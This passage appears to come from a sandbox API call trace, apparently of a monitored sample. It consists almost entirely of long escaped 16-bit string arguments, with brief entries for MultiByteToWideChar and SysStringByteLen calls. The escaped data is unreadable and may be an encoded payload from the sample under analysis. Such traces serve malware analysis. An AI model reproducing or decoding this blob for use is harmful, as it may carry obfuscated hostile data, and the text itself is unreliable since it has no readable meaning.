d929\x3739\x4def\x31e3\x84cf\x322f\x5584\x1d97\x9154\x96c5\x426d\x79f8\xd133\x357b\xe6e5\x33a6\x9446\x9e26\x3104\x52d\x9b45\x5c7\xe847\x461d\xe458\x2132\x3164\xfeb\x421d\xefd0\x5903\x357b\x20b\x2956\xf6\xc056\x3404\x40b8\x84ed\x5113\xe447\x469d\xa51c\x86c3\x3964\xe375\x28a\xeb34\x2d43\x543\x835a\x992a\xc026\xc056\x3104\x5a9\x3945\x3b63\xe4ed\x465d\x64c8\xed33\x3164\x3e9\x682d\x7994\x3933\x357b\x263\x275b\x30d4\x3414\xdb54\x350b\x6be5\x7753\x3c47\x5b2\x6434\x2c9b\xb1a4\x72fe\xa62d\xa61\xd333\xf4f1\x8756\x723a\x8540\xf556\x8436\x7449\xc646\x35e6\x3786\x4698\x149c\x9837\xf054\x875d\x1c2d\x9935\x1260\x5f0\x827a\xfdc\x65f2\x2149\x2da4\xc551\x323\xbfe7\xc023\xd244\x432\x3b03\x178\x5b14\xb2e0\x1f24\x9de1\x89f1\x6e4e\xb966\x0a\x8c56\xffe2\x2439\x32f5\x457b\x2847\x44dd\x6305\xa587\xc19b\xe22c\xcb1d\x4904\x1d93\x874b\xc257\x3b56\x4092\x444a\x6d36\xf39\x29ef\x3563\x44e7\x8e28\x5544\xdd3f\x8755\x43b1\x732c\x7122\x3983\x167a\x829b\x6f54\x8762\x6c26\x24c4\x6cf8\x4101\x4d51\x847c\xb72b\xd8a4\x2c83\xa066\x1229\x98d1\x799f\x5d1a\xc34c\x3027\x326\xe848\x3466\xc0e1\x7912\x3375\xc5cb\xd445\x401d\xc1c5\xaf0c\x7e7e\x2c59\x5d2c\x5635\x3132\xa54a\x3202\x3314\x74ce\x3414\xb4cc\xc508\x4e59\x3511\x9f93\xdc1d\x543e\x2d70\x1bf8\x331b\x6009\xf94b\x2ca1\x49\xb34e\x8654\x3142\x8155\x9134\xb5b6\x8446\x3453\x8243\xc62d\xe130\x2c33\x8451\x1059\x47ac\x4980\x2d32\xc358\x9a6d\x3234\xbe75\xa5ca\x3174\xd1d1\x3506\x2753\x3eb7\x6889\x5474\xec3d\x66e0\x375d\x4cda\xb958\x9c33\x9d1d\x1233\xe117\xdc4e\x34a2\x41c0\x49\x3044\xcda3\x3d47\x472d\x385\x22f\xc1e1\x37fa\xcc15\x7915\xdd98\x548\x3227\xcf7c\x3032\x4e2\xa934\x35f9\x809\x85a6\xcfd7\x59dd\x2416\x5d66\x8054\x22a\x3834\xf908\x49f2\x34bb\x37a6\x3369\x3159\x646e\x7051\x4d49\x3175\x5eb\xcc47\x762c\x9834\x6cbb\xbd54\x71c4\x4229\xe9d8\xd1d9\x7436\x6257\xb44c\x46b1\x422\xc033\x9113\x3141\x3509\xa43a\xb66d\xad3e\x4a69\x31a4\x6622\x421d\x79bb\x8e33\x357b\x2e0\xf856\xd7\xeb56\x3104\x5ba\x3645\x4663\xd92f\x561c\xa4c0\x101b\x310f\x32a9\x351a\x4325\x70cc\x241f\xf5c\x2257\xd4e\x2557\xc39\x2448\x4e4b\x346e\x3b56\x4710\x4425\x2c0e\x2045\x326a\xfa45\xf134\x2997\x354b\xf31\x3365\x8a82\xb306\x3175\x2321\x2245\x3513\xc084\x462c\x4434\xa08b\x3114\x3358\x95fd\x6d77\xcd33\x394b\x57\x756\x73a2\x346e\x23cc\x694a\x5d44\x3b5a\xb19f\x6a5\xa834\xa933\x3155\xf544\x22a3\x259c\x2d72\x35b4\xf357\x4fdf\xa342\x3416\xd278\x350a\x3054\x3653\x75b\x466d\x5421\x2c13\x34d5\xd759\xe755\x8126\x6901\x350b\xaed7\xff56\xf3a8\x54c0\xf16f\xf44e\x5946\x3493\x3d46\x8e49\x5e37\x2d72\x3d50\x2359\xd22d\x4df4\x2987\x714c\x35d6\xff56\x7471\x7e51\xf1e8\xd947\x3185\xd8c7\x1587\x4e3c\x5474\xed89\x9954\x73f0\x622d\xe124\x2d73\xf553\x8a57\xb37b\x3002\xdfb6\x3174\xf5d9\x9140\xd97f\x3407\x8675\xe036\x2cf3\x5d56\x3099\x1fa5\x4974\x86cb\xf5e0\xf257\x7b55\x3f82\xf426\xad35\x3289\x3346\x2944\xe846\x755\x5034\xad5d\x3115\x67ad\x426c\x8908\x2d31\x3f03\x3215\x8ede\x3003\x9056\x734f\xe549\x7018\x2553\xf81b\x466d\x72f5\x2d73\x4556\x6f59\x50ed\x8948\xe830\xb40f\x8a41\xf317\x5073\x709c\xbd33\x308d\x249d\x3693\xf4a0\xbb2d\x54f4\x1922\x6514\x1659\x42ed\x890d\x6033\x358b\x4736\x3396\xf037\xbd56\x31f4\x3b88\x7684\x6003\x7a87\x4629\x5ed9\x2df3\xf144\x6959\x8228\x7b32\x2df3\x71ca\x3673\x7a62\x3942\xef\x3434\xd4b6\x32c3\xc869\x37c5\xc795\x163b\xecce\x927b\x5427\xa32f\xb62d\x2f5e\x2eaa\x3033\x2b97\x3720\x29b7\x35d9\x2aa8\xdc3a\xd457\xd966\xa729\x3917\xcc31\x5271\x335b\xa2b0\x4c75\x65d5\x10aa\x1432\xbdaa\x7422\xd652\x9177\x3505\xf145\x7566\x344f\x4611\x1257\x2397\x373e\xe35b\x5ccd\x68a0\x2d73\x33d7\x735f\xbb56\xe22\x966a\x3174\x914d\xd191\x3212\x3406\x9ea1\x34b1\x940c\x7034\x7251\x522d\x4854\x3d1f\x558b\xd217\x3d56\xa9a2\x8a9a\x5125\xe27d\x3105\x7432\xed9f\xc66d\x7434\x6de9\xd954\x53e1\x1228\x9f0\x6d33\x30ab\x5223\x9f56\x612\x3416\x51a0\x9549\x3125\x202f\x3427\x26a5\xc434\x2853\x8a10\x5719\xfa2d\x4c54\xef7b\x3eab\x3237\x86a6\x79a2\x54c6\x913d\x7a29\x6124\xd597\xb643\xa6c1\xd038\x6dc2\xb554\x7e38\x2278\x5d3d\x2353\xd5ef\x7257\x34b6\x35be\x3636\xd100\x8d5c\x7184\xe553\x5412\x9a28\x5454\x4df5\x2b56\x3739\x1409\x2988\xcd22\x194b\x7137\x534a\x1642\x5497\x9135\x759a\xa745\x36b3\x6ca6\x233\x58d4\x1432\x312b\x3776\x1df9\x4976\x7533\x7499\xa57\x7209\x30c2\x913a\x3175\xbf19\x3025\x7573\x3405\xda91\x254\x6f2d\x3154\xdc5d\x426c\xedcc\x2d71\xc94b\x73fe\x3f56\x7139\x3456\x2d74\x350b\xa91\x7511\x6847\x47f\xee34\x2ab2\xd3ed\x93a7\xbd3c\xf3d5\x25b2\x342e\x3bd6\x5689\xb143\x515c\xb035\x5042\x944\x39d3\x3522\xc7d6\x3139\x7132\x3fd4\x323c\x4dac\x4851\x3db2\x50b4\xb356\x5647\xb143\x5144\xb035\x505a\xb044\x4247\x3522\x53ac\x5550\xcd32\x543b\xda83\x2e64\xa939\x917a\xa7ab\xa3f6\xb1e\x3002\x7e5e\xb134\x10cb\x44c9\x3b91\x1447\x61a\xa434\x6dcd\x9154\xc82d\x426d\x294c\xf91d\x36ab\xa97\x73b3\x1442\x54b0\xd109\x3148\xcee1\x76b3\x747e\x1a2d\xfc35\x2d72\xd1c8\x9b5b\x474d\x2974\xd31\x367b\x3216\x53ea\x9042\x6452\x3175\xcfcd\x6525\xd58e\xe10e\x6ad\x8034\x6dce\xdd54\x3b39\xb681\xa9cd\xcd35\xa549\x33b7\xd3ae\xf247\x5422\x8531\x75f4\x5045\xd418\xf47b\x4655\x5475\x2fa7\x65b4\x39b9\x4e87\x4154\x4d73\x9d4a\x3337\x53a2\x9a42\xd402\xf535\x36a9\x518d\x141\x3b27\x62af\x54d4\xd13f\x3114\x5309\x222d\x92a8\x2d73\xd5d3\x5357\xeb12\xd015\xd545\x507b\xeb00\x3025\x5567\xe04a\x2678\xbc33\x2d53\xd1b0\x4758\x574d\xcc28\x2ad3\x85a1\xe57\x7253\x4142\x1e7d\x41b8\xc349\x31b5\x45cf\x8847\xede4\x6744\x2d83\x4180\xdb53\x471d\xf930\x8731\xc5d3\x2e63\x3026\xc0a6\x1c5e\x31c4\x7183\x31b5\x858f\x3c45\x758e\xb0c\x2215\x304b\x3246\x4332\x4821\x5487\x3509\xde57\x7221\xd042\x76ad\x3134\xb629\x3104\xae4f\x3405\xb62d\x15c0\x5133\x7384\x7359\x8f45\x4975\xc777\x223b\xc238\x3317\x7aee\x1d66\x33f5\x2a3c\x3204\x80ac\xf547\xf32e\x1534\x9837\xf054\x865d\x32d\x3631\x2d86\x308a\x32e2\x3517\x30f7\x3297\x3181\xbad5\x3605\x35e6\x3386\x4699\x5435\x9a21\x333b\x843e\x2e42\x9a5\x8133\x9daf\x3214\xb358\xc84f\x2726\x8539\x5526\x3309\x3ba4\xc483\xf72d\xb85a\xc97\x5315\x356\xf117\x7144\x2d43\x341e\x656\x33ae\x304f\x3857\x5e84\xac29\x3075\x310f\x5bf0\x69c\x9a44\x37c3\x101\xf35d\x591d\xd964\x8f0a\x353b\xdb5f\x3326\x2512\x1026\xc19e\x563\x8062\x2f73\x425\x5e2c\x3a84\x2882\xb28\xb31b\x5a2d\x897\x133\x85d1\xb069\x33e\xb129\x3417\xf520\x3539\x160\x9d52\x3577\xc915\x41c4\x6f72\x31d4\x4211\x426c\xf4e4\xb283\x5791\x5ea4\x43aa\xc144\xbc3a\x3574\x59b4\xa513\x3ce3\x58be\xb696\x9b34\x2d03\x34b7\x3369\x72da\x4234\x6d08\x2a4b\x202\x56\x3072\x411\x6a34\x3579\xe4c6\x3563\x428\xd12d\x5404\x1d98\x8054\xde50\x4ddc\xf978\x9422\x9126\x33e3\x59c1\x3c53\x6989\x2050\x844\x2044\x85d\xcc46\x493d\x5509\x89cd\x2144\x3264\x533c\x4b4a\x3f23\x3476\x2146\xea1\x2143\x942\xad35\x2059\x3078\x2342\x357a\x5742\x6023\xac32\x2342\xcb2e\x5a3d\x4807\x932\x224b\x14e1\x52be\x16f5\xa60a\x711c\xf549\x40b5\x845a\x85e\x426d\x4734\xb87\xc030\x3523\x111d\x49c4\xb82\xeb4f\x8a4\xc7f6\x9842\x44bd\x34\x915e\x3135\xb551\xc547\xf72d\x711e\xb82\x1ac\xb358\xf52e\xf512\x8515\x350b\xc243\x5f55\x58b2\x492\x1ea1\xa0f8\x7730\xa3e2\x5df6\x7601\x9012\x5e28\x4024\x32a9\x5e2d\x2444\x2d83\x4dfa\x19bf\x3326\xa633\x448a\x3d34\x3439\x4f09\x747b\x9447\x461c\xa44b\x7814\x5915\x8759\x3276\xa97b\xbc3\x35bb\xd2bf\x72a5\x8042\xc7da\xc012\xc44f\xb763\x851b\xc94e\x760b\x1409\xd433\x1172\x3377\x422c\x3864\x9b31\x740b\x95e5\x3357\x3046\x406\x6936\x588\xd545\x71ca\xec40\x141d\xbc5\xa939\x31a4\x3ca\x712d\x90a\x8733\x50c\x6957\x3366\xc0b5\x3f56\x3144\x2ae3\x3175\x53c\xb747\x461d\x64a3\x4733\x41f6\x8f58\x421d\x79e2\x8d33\x354e\xc3fa\x8b47\x18f2\x1def\x81c4\x3148\x33f5\xc4f2\x3252\x452d\x2554\xfd31\x22e4\x4e0c\x5e2f\xdec4\x1d11\x1d4b\x3267\xe78\x3072\x43e\x8e37\x96d3\x82de\x6dc9\x9cc6\x6229\xb478\x4537\x34f5\xc231\xa29\xf064\xbd73\xca48\xadb6\x6357\x89ee\xab10\x535\x794a\x30d7\x74eb\xcb53\x629f\x43e5\x8c7\x3062\x2b88\x4319\x4535\x2f41\x95bd\x2a87\x326b\xe0ba\x94c\xe035\x852\x6f44\xe5c7\x5b\x72c\xa62d\x6537\x35ab\x5ce3\x5cfc\x4a89\x32e2\x3478\xa256\x8605\x5839\x50e4\x1f83\xa5e5\x46f5\x6023\x844f\x4a27\x6b98\x5443\x91e0\x2ab5\x445e\x5592\x2dc3\x264a\x293b\x6625\xc48e\x6e56\x45e0\xe549\x3135\x1be2\x449f\x4d2d\xa467\x9c30\x197a\x319\x47ed\x6783\x7717\x455a\x2bc6\x1a26\x64f2\x44fe\x8d34\x51c\xed45\x31a3\x4af\x3a2d\x5404\x2b3f\x4148\x4372\x362d\x83e\xe933\x3811\x3267\x3b2\x40e6\x1867\x3044\x9e37\x3275\x1a62\x44cd\xd42d\x64c4\x1d13\x6754\x431d\xb32c\x6507\xb383\xc563\xaa0d\x3dc6\x3003\x4426\xe537\xc545\x34ec\x3563\x4af\x4eaf\x153f\xbd33\x181\xd359\x439d\xb964\x4931\x367a\x37a7\xbf5c\x3032\x8406\x6944\x77d8\x3145\xba4f\x3405\xce21\x5475\xd137\x4124\x8adf\x426f\xbed4\x1dae\x3e10\xabe7\x34e6\x3933\xe8be\xb4c4\xc524\x69cb\x3823\x6ba\x7679\xad3a\x4201\x31ed\x3377\x422c\x4954\x2d33\x496b\x72e1\xcc56\x3042\x3457\x35b4\x4149\x7105\x4953\x2c47\xa26d\x10ad\xd34\x32c9\xce05\x426c\x5808\x6d72\x104b\x3e57\x666f\x3c42\x341b\x5038\x3949\x3130\xbc55\x3492\xee2b\x6a34\x2df1\xed52\x3559\xde2d\x4934\x12eb\x350b\xcf3\x7316\x3442\x7445\x3b34\x3349\x6455\x3353\x3475\x63\x5234\x2d32\x3414\x333d\x432e\x49d8\x2d33\x3864\x2e70\x3303\x1269\x3756\x311c\x1b4a\x3245\x7409\x747\xc775\x7030\x2d6f\x5963\x321c\x2a11\x7835\x9463\x350b\xcd4c\xd2fc\x2953\x2210\x7d2d\x2c4b\x31fd\x351a\x5247\x7510\xeef4\x5a63\x7004\x5b59\x423b\x8a3e\x24b4\x9113\x70c6\x3ad8\xbf5e\x3dd0\x316c\xac57\x2cc7\xbd5f\x29c1\x4fab\x24c8\x24b5\xb0c7\xb136\xfe3e\xc68d\xcd14\xb3bc\x1b44\x76d0\x3be6\x27d3\xb134\x1583\x4945\xb8eb\xb507\xc420\xd5ff\x2cfe\x3d52\xa759\x426d\xa88c\x2d70\x345c\x3457\x70d2\x3002\x343b\xb0b4\x3e48\xed45\x7ed0\xe449\xd5ad\x3014\x6ed3\x6554\x32d9\x918d\x934\x5333\x755a\x2257\xb312\x3002\x2606\x3174\xb5b1\x3150\x7e5b\x3407\x6e8d\x5475\xe513\x718f\x5359\x53ad\x8528\x6d1b\x594b\x3a97\xf3dc\x5442\x3cfb\x3174\xf5d9\x8544\x76a9\x9447\x80c1\x5474\xedef\xcd54\x3399\x9a27\x42f4\xed8f\xa94b\x724e\x9356\x195a\x3417\xf11c\xd49\x3185\x4df3\x7491\x322d\x58f4\xed7f\x3b56\xf3f5\xc22f\x48f4\x3f77\x350a\x725d\x2896\xf0ee\xd054\x7154\x3549\x2a4d\x3512\x11e7\x466c\xfc94\x6d86\x1954\x3699\x82fd\xe331\xed4f\xbd4a\x3297\xf372\x3848\x3796\x8934\x7564\xd945\x7586\x8647\x8609\x8826\xed6e\xf17e\x2758\x69ed\xa19e\x2bf3\xf513\xce5e\x3296\xf00e\x2257\xf050\xf54b\x4362\x3593\x217b\x426c\xc034\x2ef3\x1b40\x3318\x1769\x49f4\xed43\xb14b\x3297\xf3ce\x8042\xf443\xf934\x3589\xf1b5\x3553\x756c\x4679\x9418\x1933\x3b94\xf315\x262c\x8961\x8d33\x358b\xf267\x372\x1c82\x75f6\x2cf4\xfb39\x3105\xf5ef\x8043\x8678\xb421\x2cf3\xf1a4\xcf59\x42ed\x492c\x6c1f\x894b\x735d\x8956\xf017\x7053\x33f4\xf511\x5d45\x3593\x31c7\x46ed\x94e8\x2d33\x7079\xab59\x8278\x8935\x2df3\xf57f\x6255\x3396\x65c2\x3496\xf144\x9553\x3085\xf597\xd847\x866c\x5834\x6c1d\x954\x3399\x4751\x49f4\xed6f\x2d4b\x7293\xf356\xf097\xc442\x31f4\xf5e1\xa545\x3193\x4445\x522c\x9435\x6f5c\xcd54\x72f9\x422d\xb6d4\x2d71\xa147\x3216\x9756\x723f\xcc56\x704a\x3549\x7e0d\x3511\xe7d3\xc66f\x1434\x6e42\xb154\xf3bc\x4248\xb1c\x4133\x760b\xd257\x3356\x3000\x480e\x3175\x55a5\x70f2\x3953\xf48c\x4702\xed24\xd3d1\x6514\xd2a6\x4397\x8c26\x2c31\xca5f\x3092\x3857\x3127\x3857\x3051\x3848\x3020\x3b52\x5138\x472c\x313b\x2c32\x5444\x3258\x273c\x6135\x2dcc\x5059\x3356\x5645\x3143\x5142\x3035\x505c\xbe44\x2352\x3522\x512c\x5550\x2d32\xc378\x9339\xd461\x4974\xcd27\x102b\x14b7\xdf76\x7007\x7156\x51d0\x444d\x7a5d\xed5d\x427\x1f4c\x6738\xd72\xc954\x726b\x232d\xc963\xaf75\x570b\x66e\x7250\x442\x36b6\x9974\x75f3\x7145\x5590\x8d19\xa686\x345d\xb501\x32b4\xd321\x8a1c\x49d4\x7913\x75f6\xce57\x3236\x8c66\x7462\xd034\xdf04\x3025\x5cb2\xfd4f\x605\xf634\x2c53\xd118\x4f00\xefe7\x2254\x4df8\x1517\x627c\x62b6\x50e6\x9e57\x5168\xfd49\x33a5\xd58b\xc247\x42cd\x8076\x2453\x9aac\x3319\x7f4c\xc8c6\x29d3\x9ceb\x3217\xfbe2\x58a2\x55e5\xd130\xc14a\xd1b2\x553c\x884d\x464d\x8a3e\x2cd3\xd110\x634b\x334\x1c34\x7c52\xd5e3\x8e57\x3336\x509e\x3056\x2b9a\x2d29\x2724\x3533\x54ff\x8e2d\x5454\xf539\x3134\x53b1\x322d\x973\x9a33\x7daa\x5036\x55b7\xd084\xd55e\xdd59\x38a9\x4d43\x3633\x4b26\x722d\x5475\x612b\x71ec\x7f6d\x40fe\xe550\x6553\x353f\x3216\xcebe\x3003\x7d46\x7334\xe549\x70b9\x6553\x34a0\x466c\x4140\x2d71\x8098\x7159\xe2d\xb02\xc133\x255a\x3215\x3ce2\x3322\x7646\x3534\x36a9\x62a5\x74fe\x9847\x16b5\x5475\xa9ff\xbd34\x53bb\xc77f\x824\x7933\x55f8\xd156\x3314\xec46\x54af\xf463\x3508\x74a1\xd552\x8d10\x466c\xcb6c\x2d72\x8934\x714e\xf82d\x4435\x13d6\xcaa7\x3c57\x3233\x3f43\x3533\x2135\x342c\x2044\x3436\x35b8\x233f\x5535\x4820\x3055\x564d\x432c\x2c21\xc232\x234a\x3332\x2457\x3127\x3486\x542c\x3448\xcc5c\x3436\x344b\x2337\x5535\x4828\x3055\x5645\xb42c\x49fc\x482e\x1d4a\x2c57\x3233\x2f43\x3533\xf9ea\x1549\x3020\x1452\x3522\x4689\x3116\xd632\x1255\x323c\x42d5\x2c10\x2c32\x506e\x3356\x2270\x3126\x3457\xd725\x1d2b\x7027\x5750\x1583\x7a14\x14a5\xa933\x39b0\x331a\xc230\x3135\x6d7b\x3d4b\x3245\xf276\x3040\x34c2\xbdc3\x547\x30a5\xd292\x2a73\x246c\xfe36\xc9df\xc555\x332d\x36dd\xb134\x2d43\x2649\x3047\x335a\x3052\x7d76\x13d\x3035\xc301\xf951\x7074\x742a\xa4c0\x5969\x4174\x30e\x7e29\x4a2b\x783\x57b3\x138b\x3317\x3b4a\x755e\x5d34\x34f9\xd4d9\x3513\x980d\x465d\x64c4\xe533\x416c\xd03e\x205\xad34\x2d03\x5cb\xe54\x748b\x18fd\x3254\x317b\x9549\x41e7\x5571\xc406\x1863\x5475\x4c4b\x3164\x9e33\x7f1d\x796b\x1d32\x4d4b\x3267\x43aa\x9a43\xc46e\x2935\x1279\x413d\x4153\x3437\xbe2f\x5444\x280b\x3116\x1ce1\x3d\xc134\x5d95\x323d\x3214\x63fc\x2562\xc40a\x755a\x3db8\x81a7\x416c\x3647\x53f\x6448\x9832\xd021\x5f5e\xb26c\x293a\x69f9\xb94c\x3323\x66c5\x30b2\x4f1\x8a34\x3579\x18a\xd653\x442\xb12d\x5404\x6738\x3114\x6646\x421d\x7907\x6a33\x357b\x20c\x5c56\x17\xb756\x3104\x5de\x9a45\x3563\xe1a0\x461d\x648b\xfe33\x3164\x3a2\xb32d\xe431\x3882\x45f3\x4b6e\x8bc7\x31f2\x49a\x8634\xbd5e\x3e14\xbc0e\x64ff\x7b20\x1c35\x22e3\xc8b\x6258\x7c3f\x1935\x1020\xcd4a\x2187\x326b\x88b8\x3569\x608e\x485f\x6047\x844\x6546\xb935\x5509\x3462\x3069\x2908\x4310\x5265\x2c0e\x291a\xfa8\x6257\x45f\x5557\xe3bb\x64dc\xc5b\x6752\xc958\xdb71\x45c\x5913\xb056\x8141\x132e\x7a15\x6532\x354a\xc45b\xdb62\xc724\x7862\xa134\x3509\xd319\x3510\xb54d\x451d\x1830\x2d73\x3175\x18ea\xee4d\x20c3\xad35\xa1bb\x6a6\xe8ee\xa4b2\x3177\xc118\xc448\x545\x3523\x34b6\x76f7\x5444\xad31\xc054\x2259\x425d\x7dc5\xa921\x347b\x386b\x7a1\x16fe\x6116\xa9c6\xc519\x7ddd\x3563\xc4eb\x7218\xa47b\x5c12\x8008\x8633\x76b1\xf99c\x4c55\x75e3\x2e57\x35e6\x4056\x9456\x3304\x254f\x3075\xa6a2\x967b\x466d\x7b78\x2dc3\xafa5\xafe8\x281c\x39f0\xa137\x5d17\x3217\x8312\x5c2b\x18e6\x5b05\xe025\x31f5\x5cb\x6846\x405d\x24e0\x9c33\x23f6\x43b5\x628c\x79a7\x3f68\x3508\x6ed3\x4303\xeb77\x3417\x61f4\xf56c\x3609\x3511\x38fb\xc19d\xd084\xfd33\x7371\xf59\x2b\x2234\x1ec2\x96fa\x8217\x5b65\x3cb2\x7eb\x86fc\x38f9\x2fc\xf0e2\x4537\xfe2f\xbcf1\x2f03\xc162\x3369\x879c\xf9ec\x9c3f\x297c\x9a1a\x3316\x69\xe56\x3104\x500\x9b45\x592\xe147\x461d\x64dd\xd033\x3164\x9eeb\x421d\x725\xea83\x357b\x26e\x9956\x0f\x5556\x3104\x4511\x4344\x3563\xb831\x461d\x5254\x5c33\x42\x8af7\xe418\xf999\x7732\x37fb\x2b26\x751\x6c85\x33a6\x4c3f\x84b\x382\x3663\x70c6\x4209\x60a6\x28b3\x5ed\xf2a9\xa3d2\x49d2\x1799\x35ad\xe36f\x6157\x30a9\xd60e\xcc34\xfc18\xe129\xc652\xe58d\xbf2b\xc9fe\xda32\x8e9e\x32c4\x88d9\x5fd5\x621\x2ffa\x1e0a\x839a\xc759\x356b\x2d85\x3474\x81fd\x84e\x8546\x7b33\xeb35\x3282\x3069\x13e8\x4319\x5415\x2581\x85b7\x4d76\x312b\x12f3\x3562\x3a02\x16f8\x3076\xf822\x215b\x2d5a\x2c58\xbe05\xf864\x70ba\x202d\x793d\x6920\x7504\xffa7\x5825\xa026\xa35e\xd932\x2ebd\xdc8d\x2e0\x5c71\x47dd\x48c5\x5d43\xd154\x335b\x1f41\x4944\xad30\xc44b\x4757\xdb60\x3172\xce52\x4a3c\xed7f\x32b5\x62e2\x4b6\x265c\x6605\x356d\x564\x8d68\x74dc\x7dc5\xdda5\x19d8\x8220\x4ac5\x4192\x843b\xaa84\x3f8\x91b4\x18bb\x34f7\x76b9\xe5e5\x85ae\x31e4\xb5ad\x7286\xf95b\xe9d3\x6bb\x825b\x9f65\x2132\x2056\x720f\xed49\x70d0\xb553\xd783\x466c\xabc0\x9f72\x3e67\x34a8\x731c\x4565\xdbca\x6567\x3217\x7e8\x3072\x56f\x705\x3e98\x778\x4533\x4145\x7010\xe478\xe53c\x5c64\x7e8\xb9dc\x4cb4\x2f03\x5c3\xbe57\x7773\xe845\x4043\x8535\x35b9\x186\xa853\x7416\x4679\x6485\xf433\x3164\x32c\x282d\xe98d\x7cba\x350b\x3292\xde66\x42\x3576\x7166\x2049\x2945\x6581\x74ef\xaa2d\x4c34\x2d35\x11cc\x3f59\x7827\x4534\x2d67\x3447\x3257\x2356\x3044\x5455\x2934\x4549\x310a\x3513\x7a37\x466d\x4730\x6d9b\x3b54\x3559\x423d\x5532\x2b33\x17e1\x3457\x337e\x1e44\x3256\x31d2\xe02f\x6744\x25cb\x5a11\x702d\x54b6\x2c35\x1bf2\x375e\x827e\x1a14\x2dc9\xb478\x7a13\x3772\x3076\x8d0e\x3100\xca2d\xd04f\x3b55\x367d\x1e23\x50b5\x6717\x3168\x5b44\x412d\x2134\x8e32\x611b\x72ee\x2a40\xa604\x785a\x3db2\xc801\x17c4\x3451\xb945\xcb0b\xd338\xa015\xb258\x377f\x695\x6bb4\x1055\xf578\x72ed\xb5a2\x3003\x223e\x34\x6c8a\x38c2\xbd3f\x3dc1\x552d\xd634\xe920") returned 0x22108 [0195.052] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x62843c, cbMultiByte=139528, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 139528 [0195.053] SysStringByteLen (bstr="\x87d2\x7c45\xa509\x3747\x462d\xd634\x2d37\xce64\x33a6\xfa2d\x7134\x2c1e\x755b\xa53\x34f\x30f2\x3a26\x312b\x3bf3\x8545\xf85a\x8c66\x472d\x9978\x7912\x583c\x332a\x320d\x2646\x5f54\x582a\x1257\x5235\x5e2c\x4039\x3114\x502b\x4365\x5b26\x5d67\x282d\x1014\x7e7c\x5c74\xb336\x2749\x441a\x273e\x316f\x32e7\xd29f\xeb45\xb4db\xb95d\x3008\x8a46\x51f5\xb8cf\x492d\x6c66\x4e5a\x303c\x374a\x440b\x1932\x2d76\x354b\x331b\x3355\xf772\x1852\x3462\xd55d\x3e45\x3e52\x35e7\x462b\x8434\xe433\x3244\xdf4c\x5149\x4e34\x2632\x34ab\x328a\x329b\xef49\x3756\xd635\x2448\x3644\x1c51\xb477\xc629\xb43f\xc08e\x3150\x315b\x4225\x4932\x1132\x354b\x31d2\x37d4\x3cc0\x3657\xe6d0\x3641\xd45\x3152\x3067\x2e2d\x5ee2\x2932\x30ef\x3379\x7217\x6835\x1a33\x554f\xa556\x1d73\x5536\x402e\x314d\x9946\xb18f\xb50d\xbd52\xc358\x742e\x2d33\x5154\x5777\x364c\x3455\x2532\x3579\xb055\x322b\xbb44\xb457\xf1b2\x1ba9\x4237\x5621\x3f47\x27af\x66f4\xac3e\x316f\x3895\x4bed\xd774\xb528\x604f\xf24f\x5f5f\x6b98\x161c\xf137\xb048\x7e45\x701f\x674\x4603\x1870\x2d7f\x6219\x710f\x14dd\x7f79\x2f03\x7d48\x8d5f\x4c54\xcf52\x2429\x214b\x2536\x213a\x252c\x3c78\x4212\x500b\x12cc\xe50\xc5d\x7d29\x7630\x1237\xa4f\xd53\xcc52\x347d\x3069\x350b\x3176\x357a\x316c\x3078\x4212\x6bcb\x1237\xe50\xc5d\x7d29\x7630\x1237\xa4f\xcd53\x3769\x347d\x3649\x302b\x3456\x305a\x344c\x3558\x59d2\x4b35\x3232\x2e55\x2c58\x5d2c\x5635\x3232\xca4a\x3348\x3249\x315d\x3549\x302b\x3456\x305a\x344c\x2bb8\x592c\x4b35\x3232\x2e55\x2c58\x5d2c\x5635\xd232\x3454\x3348\x3249\x315d\x3549\x302b\x3456\x305a\x2aac\x2b46\x592c\x4b35\x3232\x2e55\x2c58\x5d2c\xb635\x2c2c\x3454\x3348\x3249\x315d\x3549\x302b\x3456\x2eba\x2a52\x2b46\x592c\x4b35\x3232\x2e55\x2c58\xbd2c\x482b\x2c2c\x3454\x3348\x3249\x315d\x3549\x302b\x2ab6\x2e44\x2a52\x2b46\x592c\x4b35\x3232\x2e55\xcc58\x4332\x482b\x2c2c\x3454\x3348\x3249\x315d\x3549\x2ecb\x2a48\x2e44\x2a52\x2b46\x592c\x4b35\x3232\xce55\x3246\x4332\x482b\x2c2c\x3454\x3348\x3249\x315d\x2ba9\x2e35\x2a48\x2e44\x2a52\x2b46\x592c\x4b35\x2232\x304b\x3246\x4332\x482d\x94e5\xc76b\x6778\x3324\x3042\xafe8\x91b4\x5d3b\x957e\xe921\xc47\xf12d\xf644\x8d41\x9321\x332b\xdee7\x3b95\x5b32\x47e9\x1957\x9032\x2730\x954d\x3146\x10e9\x43e4\xee66\x46e6\x262f\x5834\x9f6a\x43f4\x92e2\xd62d\x4c46\x8cfe\x2539\x1a09\x41f5\x3078\x1758\x3f34\xd5be\x9145\xd121\x9488\xf5f\x7c6b\x5f90\x3175\x692f\x4c2d\x3100\x8f33\x7239\x902d\xaa24\xb0c0\x46f5\x5ed6\x47eb\x316a\x15ed\x49fe\x348f\x5440\xa7e5\x392b\x41fb\x4287\x837\x8c6e\xb139\x92aa\x7c56\x9189\x5524\x6a34\xb24b\x2a45\xfb3a\x46e7\x7c3e\xf034\xa841\x91ce\xec2b\x426a\x3b96\xaa25\x47e8\x4f8c\x90d6\xf430\x97df\x4046\x3649\x1765\x972d\x7935\x7d2d\x5b62\x8f33\xb826\x9205\x935f\xc9a3\x5f92\xbaa2\x40f5\x3349\x3031\xe40b\x4397\xfd14\x43e4\xe013\x9640\xf85f\x543a\xf348\x9054\x4b2b\xe334\xbe46\x2d60\x47ea\x644f\x41f4\x7237\x9556\xa146\x975b\x7137\x353f\x46d3\x9cce\x2695\x723e\x90d4\x1e2b\xe34c\xb146\x2cb3\x484b\x93b8\x9724\xa477\x3424\x5310\x47e8\x50e4\x47f0\x4247\xe54f\xce46\x8f5e\xb326\xb3f4\xdc2c\xeb5a\x9c41\x34cb\xaf55\xb4d6\x530a\x46f5\x2d64\x9461\xa237\x34d3\xb41d\x5f2a\x7c29\x5f92\xb182\x7e5c\x59ad\x7b6e\x8c31\x9ec9\x17a8\x23da\x3002\xcbfe\xd11\x37cb\xb315\x8551\x36c5\x4279\xd525\xdd38\x34d6\xb16d\xca2f\xcb61\xc531\x37c9\xb07b\x3b58\x32c0\x61ae\x39b6\xb731\x147\x37d1\xb68b\x6e2f\xd661\xfd3d\x34d6